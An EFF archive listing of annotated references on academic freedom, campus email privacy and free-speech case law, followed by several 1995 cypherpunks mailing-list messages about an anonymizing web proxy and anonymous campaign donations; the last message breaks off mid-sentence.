=================<a href="ftp://ftp.eff.org/pub/CAF/law/ecpa.1986.godwin">
law/ecpa.1986.godwin
=================</a>
* Privacy -- E-mail -- ECPA - University Site

Mike Godwin, legal services counsel for the Electronic Frontier
Foundation (EFF), says that the Electronic Communications Privacy Act
(ECPA) could be reasonably construed to protect university email.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ferpa.text">
law/ferpa.text
=================</a>
* Privacy -- Students -- FERPA (Buckley Ammendment)

The full text of the Family Educational Right to Privacy Act
(Buckley Amendment).

=================<a href="http://www.eff.org/CAF/faq/email.policies.html">
faq/email.policies
=================</a>
* Email -- Policies
 
q: Do any universities treat email and computer files as private?
 
a: Yes, many universities treat email and computer files as private.
...

=================<a href="ftp://ftp.eff.org/pub/CAF/library/confidentiality.1.ala">
library/confidentiality.1.ala
=================</a>
* Confidentiality -- 1 (ALA)

The American Library Association's "Policy on Confidentiality of
Library Records"

Suggests how to handle police or official requests for information
about a user.

=================<a href="ftp://ftp.eff.org/pub/CAF/library/computer.draft.ala">
library/computer.draft.ala
=================</a>
* DRAFT: Access to Electronic ... Services and Networks ... (ALA)

A draft interpretation by the American Library Association of the
"Library Bill of Rights"

Says in part: "Libraries and librarians exist to facilitate [freedom
of speech and freedom to read] by providing access to, identifying,
retrieving, organizing, and preserving recorded expression regardless
of the formats or technologies in which that expression is recorded."

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/bill-of-rights.aahe">
statements/bill-of-rights.aahe
=================</a>
* Bill of Rights ... for Electronic ... Learners

This is the "Bill of Rights and Responsibilities for the Electronic
Community of Learners". It could become the first widely endorsed
statement directly related to computers and academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement">
statements/caf-statement
=================</a>
* Computer and Academic Freedom Statement -- Draft

This is an attempt to codify the application of academic freedom to
academic computers. It reflects our seven months of on-line discussion
about computers and academic freedom. It covers free expression, due
process, privacy, and user participation.

Comments and suggestions are very welcome (especially when posted to
CAF-talk). All the documents referenced are available on-line.
(Critiqued).

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement.critique">
statements/caf-statement.critique
=================</a>
* Computer and Academic Freedom Statement -- Draft -- Critique

This is a critique of an attempt to codify the application of academic
freedom to academic computers. It reflects our seven months of on-line
discussion about computers and academic freedom. It covers free
expression, due process, privacy, and user participation.

Additional comments and suggestions are very welcome (especially when
posted to CAF-talk). All the documents referenced are available
on-line.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/student.freedoms.aaup">
academic/student.freedoms.aaup
=================</a>
* Student Freedoms (AAUP)

Joint Statement on Rights and Freedoms of Students -- This is the main
U.S. statement on student academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/speech-codes.aaup">
academic/speech-codes.aaup
=================</a>
* Speech Codes (AAUP)

On Freedom of Expression and Campus Speech Codes Expression - An
official statement of the American Association of University
Professors (AAUP)

It says in part: "On a campus that is free and open, no idea can be
banned or forbidden.  No viewpoint or message may be deemed so hateful
or disturbing that it may not be expressed."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/uwm-post-v-u-of-wisconsin">
law/uwm-post-v-u-of-wisconsin
=================</a>
* Expression -- Hate Speech -- UWM Post v. U Of Wisconsin

The full text of UWM POST v. U. of Wisconsin. This recent district
court ruling goes into detail about the difference between protected
offensive expression and illegal harassment. It even mentions email.

It concludes: "The founding fathers of this nation produced a
remarkable document in the Constitution but it was ratified only with
the promise of the Bill of Rights.  The First Amendment is central to
our concept of freedom.  The God-given "unalienable rights" that the
infant nation rallied to in the Declaration of Independence can be
preserved only if their application is rigorously analyzed.

The problems of bigotry and discrimination sought to be addressed here
are real and truly corrosive of the educational environment.  But
freedom of speech is almost absolute in our land and the only
restriction the fighting words doctrine can abide is that based on the
fear of violent reaction.  Content-based prohibitions such as that in
the UW Rule, however well intended, simply cannot survive the
screening which our Constitution demands."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/gillard-v-schmidt">
law/gillard-v-schmidt
=================</a>
* Privacy -- School -- Staff Desk -- Gillard v. Schmidt

Description of an appellate court ruling that the school board could
not search the desk of a school counselor without a warrant.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/email.gov-employee">
law/email.gov-employee
=================</a>
* Privacy -- E-mail -- Government Employees

A U.S. government task force: "[Email] monitoring [of government
employees] of actual communications and communicators may impinge on
the Constitutional rights of freedom of speech (1st Amendment),
against unreasonable search and seizure (4th Amendment), and against
self-incrimination (5th amendment), as well as on the right to
privacy, specifically as set forth in both the Privacy Act and the
ECPA." Enclosed are guidelines for legitimate monitoring of government
employee email.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/mass-student-searches">
law/mass-student-searches
=================</a>
* Privacy -- Mass Students Searches

An excerpt from The ACLU Handbook: _The Rights of Students_, stating that
"there must a reasonable suspicion directed specifically at each student
before a school official can search students."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/constraints.constitutional">
law/constraints.constitutional
=================</a>
* Constitution -- Public University -- Constraints

Comments from _A Practical Guide to Legal Issues Affecting College
Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D.
Gehring.  (College Administration Publication, 1985).  Discusses the
constitutional constraints on public universities including the
requires for freedom of expression, freedom against unreasonable
searches and seizures, due process, specific rules.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ecpa.umich">
law/ecpa.umich
=================</a>
* Privacy -- E-mail -- ECPA - University Site

A summary of a newspaper report that the U. of Michigan's lawyers
believe(d) that the institution is barred under the federal Electronic
Communications Privacy Act from reading electronic mail.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/privacy.email">
law/privacy.email
=================</a>
* Privacy -- E-mail -- Law -- Hernandez

"Computer Electronic Mail and Privacy", an edited version of a law
school seminar paper by Ruel T. Hernandez.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/privacy.workplace">
law/privacy.workplace
=================</a>
* Privacy -- Workplace

Comments from and about _The new hazards of the high technology
workplace_ see (1991) 104 _Harvard Law Review_ 1898. Talks about email
and other electronic monitoring.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/email.bib">
law/email.bib
=================</a>
* Privacy -- E-mail -- Bibliography

I have been having an e-mail conversation with Stacy Veeder for several 
days on the topic of e-mail privacy. She mailed me this bibliography
which she has compiled for two papers which she is currently writing.

I post it here with permission.

PS - She is interested in talking with anyone who has some views on the 
topic/information to share.

Mark N.

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org, and then:

  cd  /pub/CAF/law
  get ecpa.1986.godwin
  cd  /pub/CAF/law
  get ferpa.text
  cd  /pub/CAF/faq
  get email.policies
  cd  /pub/CAF/library
  get confidentiality.1.ala
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get gillard-v-schmidt
  cd  /pub/CAF/law
  get email.gov-employee
  cd  /pub/CAF/law
  get mass-student-searches
  cd  /pub/CAF/law
  get constraints.constitutional
  cd  /pub/CAF/law
  get ecpa.umich
  cd  /pub/CAF/law
  get privacy.email
  cd  /pub/CAF/law
  get privacy.workplace
  cd  /pub/CAF/law
  get email.bib

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/law
  get ecpa.1986.godwin
  cd  /pub/CAF/law
  get ferpa.text
  cd  /pub/CAF/faq
  get email.policies
  cd  /pub/CAF/library
  get confidentiality.1.ala
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get gillard-v-schmidt
  cd  /pub/CAF/law
  get email.gov-employee
  cd  /pub/CAF/law
  get mass-student-searches
  cd  /pub/CAF/law
  get constraints.constitutional
  cd  /pub/CAF/law
  get ecpa.umich
  cd  /pub/CAF/law
  get privacy.email
  cd  /pub/CAF/law
  get privacy.workplace
  cd  /pub/CAF/law
  get email.bib



=============== ftp://ftp.eff.org/pub/CAF/faq/netnews.writing ===============
q: Should my university allow students to post to Netnews or have Web pages?

a: Yes. Free inquiry and free expression are an important part of a
university's mission. Most universities encourage and support student
expression and publication. Most universities also seem to give full
network access to all users, even students. (This conclusion is based
on an informal survey posted to comp.admin.policy in October, 1991.
[cafv01n33])

There is probably no need to create special rules for student computer
media; your university likely already has rules for student media.
(Look in your Student Code.) In the U.S., most student publications
are free of university screening, censorship, and most retaliation.
(For state universities, this is a legal requirement.) At the same
time, most universities disclaim responsibility for student
publications, even when the university "owns the presses."

The American Library Association's draft policy recommendation
on electronic services and networks says (in part):

    No user should be restricted or denied access for expressing or
    receiving constitutionally protected speech.  No user's access
    should be changed without due process, including, but not limited
    to, notice and a means of appeal.

- Carl

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

=================<a href="ftp://ftp.eff.org/pub/CAF/library/computer.draft.ala">
library/computer.draft.ala
=================</a>
* DRAFT: Access to Electronic ... Services and Networks ... (ALA)

A draft interpretation by the American Library Association of the
"Library Bill of Rights"

Says in part: "Libraries and librarians exist to facilitate [freedom
of speech and freedom to read] by providing access to, identifying,
retrieving, organizing, and preserving recorded expression regardless
of the formats or technologies in which that expression is recorded."

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement">
statements/caf-statement
=================</a>
* Computer and Academic Freedom Statement -- Draft

This is an attempt to codify the application of academic freedom to
academic computers. It reflects our seven months of on-line discussion
about computers and academic freedom. It covers free expression, due
process, privacy, and user participation.

Comments and suggestions are very welcome (especially when posted to
CAF-talk). All the documents referenced are available on-line.
(Critiqued).

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement.critique">
statements/caf-statement.critique
=================</a>
* Computer and Academic Freedom Statement -- Draft -- Critique

This is a critique of an attempt to codify the application of academic
freedom to academic computers. It reflects our seven months of on-line
discussion about computers and academic freedom. It covers free
expression, due process, privacy, and user participation.

Additional comments and suggestions are very welcome (especially when
posted to CAF-talk). All the documents referenced are available
on-line.

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/bill-of-rights.aahe">
statements/bill-of-rights.aahe
=================</a>
* Bill of Rights ... for Electronic ... Learners

This is the "Bill of Rights and Responsibilities for the Electronic
Community of Learners". It could become the first widely endorsed
statement directly related to computers and academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/student.freedoms.aaup">
academic/student.freedoms.aaup
=================</a>
* Student Freedoms (AAUP)

Joint Statement on Rights and Freedoms of Students -- This is the main
U.S. statement on student academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/speech-codes.aaup">
academic/speech-codes.aaup
=================</a>
* Speech Codes (AAUP)

On Freedom of Expression and Campus Speech Codes Expression - An
official statement of the American Association of University
Professors (AAUP)

It says in part: "On a campus that is free and open, no idea can be
banned or forbidden.  No viewpoint or message may be deemed so hateful
or disturbing that it may not be expressed."

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/academic-freedom.wus">
academic/academic-freedom.wus
=================</a>
* Academic Freedom (WUS)

The Lima Declaration on Academic Freedom and Autonomy of Institutions
of Higher Education, an international declaration by the World
University Service.

Source: _World University Service Academic Freedom 1990: A Human
Rights Report_ by Laksiri Fernando, et al.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/academic-freedom.can">
academic/academic-freedom.can
=================</a>
* CAUT-ACPU Policy on Academic Freedom (Canada)

Policy statement on academic freedom for the Canadian Association
of University Teachers.


=================<a href="ftp://ftp.eff.org/pub/CAF/policies/netnews.uwm.edu">
policies/netnews.uwm.edu
=================</a>
* Edu -- U. of Wisconsin-Milwaukee -- Netnews

These are the network policy resolutions developed by the Computer
Policy Committee at the University of Wisconsin-Milwaukee. The
resolutions were approved by the Committee and forwarded to the
Chancellor. They were given final approval by the Chancellor as campus
administrative policy (memo dated 02/23/93).

They say (to paraphrase) 1) Netnews is important 2) No restrictions
should be imposed without wide consultation 3) The principles of
intellectual freedom developed for university libraries apply to
Netnews material 4) The principles of intellectual freedom developed
for publication in traditional media apply to computer media.

=================<a href="ftp://ftp.eff.org/pub/CAF/policies/netnews.uwo.ca">
policies/netnews.uwo.ca
=================</a>
* U. of Western Ontario -- Netnews policy

It says in part: "In its publications regarding Usenet, CCS should
make it clear that the individual user bears the primary
responsibility for the material that he or she chooses to send or
display on the network or on the University's computer systems."  It
also specifies a procedure for dealing with challenges to material.

=================<a href="ftp://ftp.eff.org/pub/CAF/news/cafv01n33">
news/cafv01n33
=================</a>
[No annotation available.]

=================<a href="http://www.eff.org/CAF/faq/netnews.reading.html">
faq/netnews.reading
=================</a>
* Netnews -- Policies on What Users Read
 
q: Should my university remove (or restrict) Netnews newsgroups
because some people find them offensive? If it doesn't have the
resources to carry all newsgroups, how should newsgroups be selected?
 
a: Material should not be restricted just because it is offensive to
...

=================<a href="http://www.eff.org/CAF/faq/media.control.html">
faq/media.control
=================</a>
* University Control of Media
 
q: Since freedom of the press belongs to those who own presses, a
public university can do anything it wants with the media that it
owns, right?
 
a: No. Like any organization, the U.S. government must work within its
...

=================<a href="ftp://ftp.eff.org/pub/CAF/law/rosenberger_v_u_virginia">
law/rosenberger_v_u_virginia
=================</a>
* Expression -- Public Forum -- Rosenberger v. U. of Virginia

A 1995 U.S. Supreme Court decision that says that it is illegal for a
state univeristy to deny funds to a student newspaper on the grounds
that the newspaper is religious. The decision confirms that the
government cannot discriminate on the basis of viewpoint in
(government-owned)limited public forums.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/san-diego-committee-v-gov-bd">
law/san-diego-committee-v-gov-bd
=================</a>
* Expression -- Public Forum -- Overview -- San Diego Committee v. Gov Bd

Excerpts from San Diego Committee v.  Governing Bd., 790 F.2d 1471.  A
decision by an appellate court that applied the Supreme Court's Public
Forum Doctrine (to a school newspaper).

=================<a href="ftp://ftp.eff.org/pub/CAF/law/stanley-v-magrath">
law/stanley-v-magrath
=================</a>
* Expression -- Public Forum -- Closing -- Stanley v. Magrath

Comments from _Public Schools Law: Teachers' and Students' Rights_ 2nd
Ed. by Martha M. McCarthy and Nelda H. Cambron-McCabe, published in
1987 by Allyn and Bacon, Inc. It says, in part, "[a]lthough school
boards are not obligated to support student papers, if a given
publication was originally created as a free speech forum, removal of
financial or other school board support can be construed as an
unlawful effort to stifle free expression." Also, "school
authorities cannot withdraw support from a student publication simply
because of displeasure with the content" and "the content of a
school-sponsored paper that is established as a medium for student
expression cannot be regulated more closely than a nonsponsored
paper". Also, it tells what to do about libel in student
publications.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/student-publications.misc">
law/student-publications.misc
=================</a>
* Expression -- Offensive -- Student Publications -- Misc

Quotes from the book _Law of the Student Press_ by the Student Press
Law Center (1985,1988). They say that four-letter words are protected
speech, that public universities are not likely to be liable for
publications that they for which they do not control the contents, and
that the _Hazelwood_ decision does not apply to universities.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/uwm-post-v-u-of-wisconsin">
law/uwm-post-v-u-of-wisconsin
=================</a>
* Expression -- Hate Speech -- UWM Post v. U Of Wisconsin

The full text of UWM POST v. U. of Wisconsin. This recent district
court ruling goes into detail about the difference between protected
offensive expression and illegal harassment. It even mentions email.

It concludes: "The founding fathers of this nation produced a
remarkable document in the Constitution but it was ratified only with
the promise of the Bill of Rights.  The First Amendment is central to
our concept of freedom.  The God-given "unalienable rights" that the
infant nation rallied to in the Declaration of Independence can be
preserved only if their application is rigorously analyzed.

The problems of bigotry and discrimination sought to be addressed here
are real and truly corrosive of the educational environment.  But
freedom of speech is almost absolute in our land and the only
restriction the fighting words doctrine can abide is that based on the
fear of violent reaction.  Content-based prohibitions such as that in
the UW Rule, however well intended, simply cannot survive the
screening which our Constitution demands."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/rust-v-sullivan">
law/rust-v-sullivan
=================</a>
* Expression -- Gag Rule -- Rust v. Sullivan

The decision and decent for the so-called abortion information gag
rule case. The decision explicitly mentions universities as a place
where free expression is so important that gag rules would not be
allowed.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/rav-v-st-paul.1">
law/rav-v-st-paul.1
=================</a>
* Expression -- Hate Speech -- RAV v. St Paul -- 1

The Supreme Court's _R.A.V. v. City of St. Paul_ decision about hate crimes.

The Court overturned St. Paul's Bias-Motivated Crime Ordinance, which
prohibits the display of a symbol which one knows or has reason to
know "arouses anger, alarm or resentment in others on the basis of
race, color, creed, religion or gender."

By 9-0, the Court said the law as overly broad. By 5-4, the Court said
that the law was also unfairly selective because it only tried to protect
some groups.

Included: summary, majority opinion, 3 concurring opinions.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/perry-v-perry">
law/perry-v-perry
=================</a>
* Expression -- Public Forum -- Campus Mail -- Perry v. Perry

Comments from the ACLU Handbook _The Rights of _Teachers_. It says
that campus mail systems (and other school facilities) may or may not
be limited public forums depending on how they are managed. (Perry v.
Perry was about an interschool mail system that was managed as a
nonpublic forum. It was one of the cases that defined the Public Forum
Doctrine.)

Also, a paraphrase from an ACLU handbook _The Rights of Teachers_. It
says that generally, speech, if otherwise shielded from punishment by
the First Amendment, does not lose that protection because its tone is
sharp.

Also, from p. 92, it says that there are legal limits to the oaths a
(public) school can ask its teachers to sign. [Some of these same
limits might apply to what a school can ask a user to sign as a
condition of getting (or keeping) a computer account.]

=================<a href="ftp://ftp.eff.org/pub/CAF/law/broadrick-v-oklahoma">
law/broadrick-v-oklahoma
=================</a>
* Expression -- Vague Regulation -- Broadrick v. Oklahoma, et al.

Summary of case law on overly vague regulation of expression. It says
a statute is unconstitutionally vague when "men of common intelligence
must necessarily guess at its meaning."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/naacp-v-button">
law/naacp-v-button
=================</a>
* Expression -- Overbroad Regulation -- NAACP v. Button, et al.

Summary of case law on overly broad regulation of expression. It says
"[b]ecause First Amendment freedoms need breathing space to survive,
government may regulate in the area only with narrow specificity."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/pd-of-chicago-v-mosley">
law/pd-of-chicago-v-mosley
=================</a>
* Expression -- Content Regulation -- Police Department of Chicago v. Mosley

Summary of case law on content-based regulation of expression. It says
that "above all else, the First Amendment means that government has no
power to restrict expression because of its message, its ideas, its
subject matter, or its content."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/cohen-v-california.4">
law/cohen-v-california.4
=================</a>
* Expression -- Regulation of Tone -- Cohen v. California -- 4

A short quote from _Cohen v. California_: "We cannot sanction the view
that the constitution, while solicitous of the cognitive content of
individual speech, has little or no regard for that emotive function
which, practically speaking, may often be the more important element
of the overall message sought to be communicated."

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org, and then:

  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/academic
  get academic-freedom.wus
  cd  /pub/CAF/academic
  get academic-freedom.can
  cd  /pub/CAF/policies
  get netnews.uwm.edu
  cd  /pub/CAF/policies
  get netnews.uwo.ca
  cd  /pub/CAF/news
  get cafv01n33
  cd  /pub/CAF/faq
  get netnews.reading
  cd  /pub/CAF/faq
  get media.control
  cd  /pub/CAF/law
  get rosenberger_v_u_virginia
  cd  /pub/CAF/law
  get san-diego-committee-v-gov-bd
  cd  /pub/CAF/law
  get stanley-v-magrath
  cd  /pub/CAF/law
  get student-publications.misc
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get rust-v-sullivan
  cd  /pub/CAF/law
  get rav-v-st-paul.1
  cd  /pub/CAF/law
  get perry-v-perry
  cd  /pub/CAF/law
  get broadrick-v-oklahoma
  cd  /pub/CAF/law
  get naacp-v-button
  cd  /pub/CAF/law
  get pd-of-chicago-v-mosley
  cd  /pub/CAF/law
  get cohen-v-california.4

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/academic
  get academic-freedom.wus
  cd  /pub/CAF/academic
  get academic-freedom.can
  cd  /pub/CAF/policies
  get netnews.uwm.edu
  cd  /pub/CAF/policies
  get netnews.uwo.ca
  cd  /pub/CAF/news
  get cafv01n33
  cd  /pub/CAF/faq
  get netnews.reading
  cd  /pub/CAF/faq
  get media.control
  cd  /pub/CAF/law
  get rosenberger_v_u_virginia
  cd  /pub/CAF/law
  get san-diego-committee-v-gov-bd
  cd  /pub/CAF/law
  get stanley-v-magrath
  cd  /pub/CAF/law
  get student-publications.misc
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get rust-v-sullivan
  cd  /pub/CAF/law
  get rav-v-st-paul.1
  cd  /pub/CAF/law
  get perry-v-perry
  cd  /pub/CAF/law
  get broadrick-v-oklahoma
  cd  /pub/CAF/law
  get naacp-v-button
  cd  /pub/CAF/law
  get pd-of-chicago-v-mosley
  cd  /pub/CAF/law
  get cohen-v-california.4





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 19 Dec 1995 02:43:05 +0800
To: cypherpunks@toad.com
Subject: (fwd) the anonymizer (Mac Anonymous Web Proxy?)
Message-ID: <v02120d05acfb2f88905a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




>
>Date: Sun, 17 Dec 1995 10:04:16 -0700
>From: webmaster@silkpresence.com (Pete Storm)
>To: apple-internet-providers@solutions.apple.com
>Subject: the anonymizer
>Message-ID: <v02140a03acf9fc782bf3@[204.17.38.3]>
>
>        hi all,
>
>        if everyone could take a look at
><http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl>, i'd appreciate it.  by
>following a link at this site, you begin surfing anoymously.  now, can this
>be programmed and run on a mac(s)?  if so, please contact me personally and
>we'll talk about my clients contracting out for this.
>
>        if you can't get ahold of my (e.g. mail bounces) try
>webmaster@joshua.silkpresence.com or webmaster@aimc.com as well as we're in
>the middle of registering the new network.
>
>thanks,
>phs
>
>
>>>>>>
>
>Pete Storm
>SilkPresence.Com                 Internet/WWW Publishing and Solutions
>webmaster@SilkPresence.Com       http://SilkPresence.Com
>
>Fabio Casartelli (August 1, 1970 - July 18, 1995)  (TdF No. 114)
>
>Fallen in the quest for ultimate glory...
>
>

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Dec 1995 12:58:49 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Political Cleanup program
In-Reply-To: <m0tRWN2-0008yUC@pacifier.com>
Message-ID: <Pine.BSF.3.91.951218102705.4985D-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, jim bell wrote:

> At 02:04 PM 12/17/95 -0800, Detweiler wrote:
...........
> A giver could CLAIM to make any sort of donation at all; but if the system
> were properly designed he could simply be lying to the  officeholder.
> 
> > moreover, other observers
> >would not be aware of the relationship. 
> 
> Not IMMEDIATELY, perhaps, but eventually the books could be opened, perhaps
> as much as years later.  (Let's say, 3 months before the end  of the term of
> the politician.
>  
> And the amounts donated could withheld, with only the total donated reported
> every 3 months or so.  (And perhaps only to 1 or 2 significant digits of
> accuracy.)  For example, a Senator will be told on January 1, 1996, that up
> until that point he's received "about" $1.4 million dollars of donations.
> He would not be able to link these donations with any particular claim.
> Somebody could claim to have given him "$2000" of donation, which wouldn't
> even show up to the accuracy of the amount told the politician.
> 

I remain unsure of the crypto-relevance, but (just to play Devil's 
Advocate) have you guys heard of canceled checks?  I get mine in my 
statement every month.  Let's see, what could I do with one for $2,000 
payable to Joe Sleazeball Politician, from whom I wanted a favor .....

EBD




> Further techniques could be  used to disguise the rate of giving.
> 
> >why do you think this would be an improvement? 
> 
> Easy.  It would remove much of the reason for a politician to treat one
> citizen differently from another citizen.  
> 
> 
> >to the contrary our current system works hard to require
> >the disclosure of who donated what to a candidate, so the candidate's potential
> >hidden agendas and ulterior motives can be revealed. seems reasonable to 
> >me.
> 
> _EVENTUAL_ public disclosure of such information is not inconsistent with
> my idea.
> 
...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 19 Dec 1995 03:35:21 +0800
To: Duncan Frissell <bdavis@thepoint.net>
Subject: Re: Political Cleanup program
Message-ID: <199512181833.KAA13146@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 12/18/95 -0500, Duncan Frissell wrote:

>At 10:35 AM 12/18/95 -0500, Brian Davis wrote:
>
>>> A better solution is to move assets and money into forms where
>>> politicians cannot get at them, thus reducing the power of politicians,
>>> and thus the incentive to buy favors from them.
>>
>>I'm not sure what you mean here:  are politicians to be prohibited from 
>>campaigning (which cost money)?  And if politicians, who generally take 
>>the form of human beings, can't get at $$$, how can you or I?
>
>Brian, the above means cut the power and the purse of politicians so they
>have nothing to sell to contributors so no contributors will buy.

Yep.  

If politicians didn't have capricious, arbitrary, and absolute power over 
individuals and businesses, there would be no market for influence peddling.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Dec 1995 03:10:31 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Political Cleanup program
In-Reply-To: <199512180430.UAA02707@blob.best.net>
Message-ID: <Pine.BSF.3.91.951218103237.4985E-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, James A. Donald wrote:

> At 11:04 AM 12/17/95 -0800, jim bell wrote:
> > It occurs to me that it would be a major advance if a system could be set up
> > that would "blind" campaign donations as to their source:  The donor could
> > be satisfied that his donation gets to the candidate or cause, but the
> > candidate couldn't know  who actually paid the money
>
See my earlier post.
 
> To make this work, the government would need to prohibit individuals
> from campaigning for politicians, taking out ads with political 
> consequences, and so on and so forth.   A short step from 
> totalitarianism

Not to mention the death of the First Amendment.  Which, under your 
scenario, would probably mean the death (or curtailment) of Cypherpunks. 

> A better solution is to move assets and money into forms where
> politicians cannot get at them, thus reducing the power of politicians,
> and thus the incentive to buy favors from them.

I'm not sure what you mean here:  are politicians to be prohibited from 
campaigning (which cost money)?  And if politicians, who generally take 
the form of human beings, can't get at $$$, how can you or I?

> of animals that we are. True law	|   James A. Donald
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Dec 1995 00:19:25 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Campaign Finance Reform
In-Reply-To: <Pine.SUN.3.91.951218031739.17673A-100000@rwd.goucher.edu>
Message-ID: <Pine.BSF.3.91.951218103957.4985F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Dec 1995, Jon Lasser wrote:

> On Sun, 17 Dec 1995, jim bell wrote:
...
> > It is absolutely true that you couldn't stop a person from communicating
> > claims of a donation to a politician.   But what you COULD do is to ensure
> > that the donor couldn't PROVE that he made such a donation.  In other words,
> > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
> > senator would have no idea that I wasn't telling the truth.  The people who
> > REALLY made such donations would be helpless.
> 
> A tricky way around this, if it's done ALMOST properly, is to donate in 
> odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to 
> your campaign..."
> 
> All this means is that the donations would have to be lumped in some way 
> so that Senator Sludgepump can't find out the exact amounts donated by 
> any individual.

Cancelled checks.

Or, hand check in addressed, stamped envelope to Senator Sludgepump and 
ask him if he would mind sealing it and dropping it in a mailbox.

Etc., etc.

For once, you guys aren't being very creative.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 19 Dec 1995 00:25:48 +0800
To: "David Klur" <dklur@dttus.com>
Subject: Re: redirect of newsgroups
In-Reply-To: <9511188193.AA819305757@cc2.dttus.com>
Message-ID: <199512181543.KAA09973@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David Klur" writes:
>      For those of us sitting behind a firewall that blocks out all of the 
